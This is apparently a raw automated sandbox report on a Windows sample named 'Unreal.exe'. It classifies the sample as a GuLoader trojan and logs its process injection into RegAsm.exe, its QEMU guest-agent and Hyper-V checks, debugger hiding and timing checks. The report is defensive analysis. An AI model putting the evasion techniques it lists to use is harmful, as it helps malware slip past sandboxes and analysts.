Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Unreal.exe	Virustotal: Detection: 41%
Source: Unreal.exe	ReversingLabs: Detection: 13%

Source: Unreal.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Unreal.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Unreal.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Unreal.exe 'C:\Users\user\Desktop\Unreal.exe'
Source: C:\Users\user\Desktop\Unreal.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 1260
Source: C:\Users\user\Desktop\Unreal.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Unreal.exe

File created: C:\Users\user\AppData\Local\Temp\~DFE28C8088C164734E.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/4@1/1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6992
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: CLBCatQ.pdb( source: WerFault.exe, 00000013.00000003.18468036475.00000000060AA000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 00000013.00000003.18488731402.0000000006900000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb( source: WerFault.exe, 00000013.00000003.18448355203.0000000000514000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb( source: WerFault.exe, 00000013.00000003.18457584237.0000000005C93000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.18445876276.00000000004D5000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 00000013.00000003.18487893314.00000000064AA000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: WerFault.exe, 00000013.00000003.18448402529.000000000044A000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb8 source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb! source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000013.00000003.18461903158.0000000005CC7000.00000004.00000001.sdmp
Source:	Binary string: iCLBCatQ.pdb source: WerFault.exe, 00000013.00000003.18450568195.0000000005161000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 00000013.00000003.18492583538.00000000064CC000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbE source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: srvcli.pdb, source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.18458800581.00000000058B4000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb( source: WerFault.exe, 00000013.00000003.18448322350.000000000050D000.00000004.00000001.sdmp
Source:	Binary string: qncryptsslp.pdb source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb( source: WerFault.exe, 00000013.00000003.18448382320.000000000051A000.00000004.00000001.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000013.00000003.18468036475.00000000060AA000.00000004.00000001.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 00000013.00000003.18478792357.0000000005CCD000.00000004.00000001.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 00000013.00000003.18487856720.00000000064A5000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb( source: WerFault.exe, 00000013.00000003.18456898801.0000000005898000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdb( source: WerFault.exe, 00000013.00000003.18457560822.0000000005C8E000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.18445925646.00000000004DB000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb( source: WerFault.exe, 00000013.00000003.18478792357.0000000005CCD000.00000004.00000001.sdmp
Source:	Binary string: RegAsm.pdb( source: WerFault.exe, 00000013.00000003.18448402529.000000000044A000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb( source: WerFault.exe, 00000013.00000003.18491865404.000000000695B000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb( source: WerFault.exe, 00000013.00000003.18492583538.00000000064CC000.00000004.00000001.sdmp
Source:	Binary string: srvcli.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdbl source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb( source: WerFault.exe, 00000013.00000003.18458800581.00000000058B4000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb~ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: gpapi.pdb( source: WerFault.exe, 00000013.00000003.18495320806.00000000069B5000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.18461838493.0000000005CBC000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdb( source: WerFault.exe, 00000013.00000003.18461019578.00000000064C1000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb( source: WerFault.exe, 00000013.00000003.18474782981.0000000005CB6000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000013.00000003.18511282417.00000000047F1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbc source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: gpapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb( source: WerFault.exe, 00000013.00000003.18488731402.0000000006900000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb( source: WerFault.exe, 00000013.00000003.18448223479.00000000004F7000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.18467435547.00000000058BF000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdb[ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.18445975471.00000000004E6000.00000004.00000001.sdmp
Source:	Binary string: i.pdb~ source: WerFault.exe, 00000013.00000003.18447539497.00000000050EF000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 00000013.00000003.18457451856.0000000005C77000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbm source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb" source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000013.00000003.18460988044.00000000064BB000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.18447678008.000000000515A000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.18461462340.0000000005C88000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb( source: WerFault.exe, 00000013.00000003.18446070364.00000000004F1000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb( source: WerFault.exe, 00000013.00000003.18457451856.0000000005C77000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.18445876276.00000000004D5000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 00000013.00000003.18489031214.0000000006A11000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdb source: WerFault.exe, 00000013.00000003.18461019578.00000000064C1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb3 source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbW source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbQ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb( source: WerFault.exe, 00000013.00000003.18483510070.0000000006439000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbF source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb( source: WerFault.exe, 00000013.00000003.18467435547.00000000058BF000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb( source: WerFault.exe, 00000013.00000003.18453188291.0000000005C7D000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.18483510070.0000000006439000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb( source: WerFault.exe, 00000013.00000003.18448297037.0000000000508000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000013.00000003.18451945559.0000000005C99000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 00000013.00000003.18455791748.00000000058C5000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb( source: WerFault.exe, 00000013.00000003.18446219822.0000000000502000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb( source: WerFault.exe, 00000013.00000003.18447912395.0000000005149000.00000004.00000001.sdmp
Source:	Binary string: psapi.pdb' source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb( source: WerFault.exe, 00000013.00000003.18462073106.00000000058A9000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdbx source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdb( source: WerFault.exe, 00000013.00000003.18489031214.0000000006A11000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.18453188291.0000000005C7D000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb( source: WerFault.exe, 00000013.00000003.18460988044.00000000064BB000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb( source: WerFault.exe, 00000013.00000003.18484709355.0000000006A72000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb( source: WerFault.exe, 00000013.00000003.18447936998.000000000514F000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdbO source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb( source: WerFault.exe, 00000013.00000003.18450505858.0000000005154000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb= source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.18447912395.0000000005149000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdby source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: schannel.pdb( source: WerFault.exe, 00000013.00000003.18487856720.00000000064A5000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb( source: WerFault.exe, 00000013.00000003.18456945964.00000000058A3000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000013.00000003.18483084836.0000000006494000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.18456945964.00000000058A3000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdb( source: WerFault.exe, 00000013.00000003.18461903158.0000000005CC7000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb+ source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000013.00000003.18457749595.0000000005CB1000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb( source: WerFault.exe, 00000013.00000003.18461462340.0000000005C88000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 00000013.00000003.18478327612.00000000064B0000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb( source: WerFault.exe, 00000013.00000003.18457749595.0000000005CB1000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb( source: WerFault.exe, 00000013.00000003.18487821063.000000000649F000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000013.00000003.18461715472.0000000005CAB000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb( source: WerFault.exe, 00000013.00000003.18447678008.000000000515A000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.18445660840.0000000000470000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.18457584237.0000000005C93000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 00000013.00000003.18457560822.0000000005C8E000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 00000013.00000003.18484709355.0000000006A72000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb\ source: WerFault.exe, 00000013.00000003.18511463189.00000000048F0000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 00000013.00000003.18479689483.00000000064C6000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb# source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb( source: WerFault.exe, 00000013.00000003.18474081621.00000000064B6000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb( source: WerFault.exe, 00000013.00000003.18483084836.0000000006494000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.18451945559.0000000005C99000.00000004.00000001.sdmp
Source:	Binary string: AcLayers.pdb( source: WerFault.exe, 00000013.00000003.18445975471.00000000004E6000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb( source: WerFault.exe, 00000013.00000003.18478327612.00000000064B0000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbI source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 00000013.00000003.18462073106.00000000058A9000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000013.00000003.18487821063.000000000649F000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb( source: WerFault.exe, 00000013.00000003.18452058007.0000000005CA4000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.18471982779.0000000005C9E000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.18445925646.00000000004DB000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 00000013.00000003.18461715472.0000000005CAB000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb( source: WerFault.exe, 00000013.00000003.18461838493.0000000005CBC000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdbu source: WerFault.exe, 00000013.00000003.18511530246.00000000048F8000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.18446070364.00000000004F1000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb( source: WerFault.exe, 00000013.00000003.18455791748.00000000058C5000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000013.00000003.18474081621.00000000064B6000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000005.00000000.18420827212.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.18430470714.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_00406669 push ds; iretd	1_2_0040666C
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_00404623 push esp; iretd	1_2_00404625
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_004064A6 push ebx; retf	1_2_004064B5
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_0040276E push ebx; iretd	1_2_00402771
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_02C440B9 push cs; ret	1_2_02C440BA
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_02C41BE3 push edx; ret	1_2_02C41C0F
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_02C405EB push ecx; ret	1_2_02C405F7
Source: C:\Users\user\Desktop\Unreal.exe	Code function: 1_2_02C4476E pushad ; retf	1_2_02C44772
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A2167 push DE1ECAFBh; retf DE1Eh	5_2_011A2176
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A1B33 push cs; iretd	5_2_011A1B34
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A0B2A push FFFFFFDEh; iretd	5_2_011A0B2C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A3221 push esp; retf	5_2_011A3223
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A628C push ds; iretd	5_2_011A6293
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A5AED push eax; retf	5_2_011A5A8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_011A2544 push ebp; retf	5_2_011A2546

Source: C:\Users\user\Desktop\Unreal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Unreal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Unreal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Unreal.exe, 00000001.00000002.16397054711.0000000002C60000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: Unreal.exe, 00000001.00000002.16397054711.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000000.18431774300.0000000001530000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6996

Thread sleep time: -225000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_011A99BA rdtsc

5_2_011A99BA

Source: C:\Users\user\Desktop\Unreal.exe

System information queried: ModuleInformation

Jump to behavior

Source: Unreal.exe, 00000001.00000002.16397054711.0000000002C60000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
Source: RegAsm.exe, 00000005.00000002.18569996974.0000000001340000.00000004.00000020.sdmp, WerFault.exe, 00000013.00000002.18560897644.0000000000428000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Unreal.exe, 00000001.00000002.16397054711.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000000.18431774300.0000000001530000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Unreal.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_011A99BA rdtsc

5_2_011A99BA

